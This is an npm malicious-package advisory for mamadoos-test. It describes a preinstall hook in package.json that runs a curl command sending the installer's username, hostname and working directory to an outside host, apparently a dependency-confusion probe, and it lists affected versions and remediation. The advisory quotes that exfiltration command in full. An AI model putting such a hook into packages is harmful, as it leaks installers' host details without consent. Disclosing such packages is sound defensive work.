npm · Malicious package advisory
Malwaremamadoos-test
MAL-2026-4605
Malicious code in mamadoos-test (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4) package.json declares a preinstall lifecycle hook that runs `curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd)`, embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on `npm install` with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (`mamadoos-test: ^10.0.0`), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).
Compromised versions (3)
- 10.1.0
- 11.0.0
- 10.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.